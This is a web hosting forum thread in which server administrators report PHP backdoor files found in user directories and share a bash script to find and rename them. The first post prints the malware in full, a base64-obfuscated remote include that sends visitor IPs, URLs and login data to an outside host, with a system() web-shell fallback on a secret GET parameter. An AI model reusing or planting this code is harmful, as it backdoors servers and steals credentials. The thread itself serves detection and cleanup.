Ack! New Vulnerabilities!

S

SteveK42

Verified User
Joined
Jul 11, 2004
Messages
43
Not sure if any of you may have fallen to the same issues yet, but I'd recommend you do a "locate" or find of some files...here's some examples:

options.php
layout.php
configs.php
base.php
time.php
date.php
tests.php
fsav.php

There's plenty more out there. These files all contain some dirty code...here's an example:

Code: 
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_en
code($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Not sure exactly what this does, but...

These files will INFEST your server. I have found them in almost EVERY user directory; meaning only safe_mode or suPHP could have stopped it. Cleaning them out is so difficult!

I think this problem is related to Gallery. About 10 of my clients reported broken Gallery templates today and then this happened. However, Wordpress templates were also broken, and phpBBfm templates; they are broken on their own.

It seems that the last two weeks has seen a HUGE jump in vulnerabilities...

Anyone else seeing this? Any ideas? Please?
 
Oh, and another thing...it also puts a .htaccess inside the directory with these phps that calls them on 404, which means you'll NEVER SEE IT in your apache logs.
 
Here, I wrote this to try to cut out these files quickly...

The only thing they don't account for are directories with spaces in the name...

Code: 
updatedb
for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
  do
    list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers"`
    for i in $list;
      do     
         thecount=`grep base64_encode $i | wc -l`
         if [ $thecount -ne 0 ]; then
           mv $i $i.hackers
         fi
     done
  done

Don't forget to do the updatedb first...and you must run this as root.

If there's a better solution, great...this is the quickest I could come up with.
 
Last edited:
jlasman said:
So why don't you use safe_mode?

Jeff
Click to expand...

I know, I need to start...I guess my only concern is how used to non safe mode my customers have gotten...their galleries will no longer work, etc etc.

*sigh*

Decisions.
 
list=`locate $problemfiles.php | grep "\/$problemfiles.php\" | grep -v hackers"`

Change the 3rd line... one syntax error
 
Last edited:
Oops! Problem in the code...here's a working version.

Code: 
updatedb
for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
  do
    list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers`
    for i in $list;
      do     
         thecount=`grep base64_encode $i | wc -l`
         if [ $thecount -ne 0 ]; then
           mv $i $i.hackers
         fi
     done
  done
 
So far all this has found is 2 user installed copies of uebimiau (why install your own? but people do) and a webmail change password plugin (checked bout 36 servers so far, say 3000-5000 domains, about 1/3 of my servers).
 
I have some settings in php.ini and most of my newer servers are set with safe_mode ON by default. Though there's probably 40 servers running safe mode off :( sadly.
 
You must log in or register to reply here.
Back
Top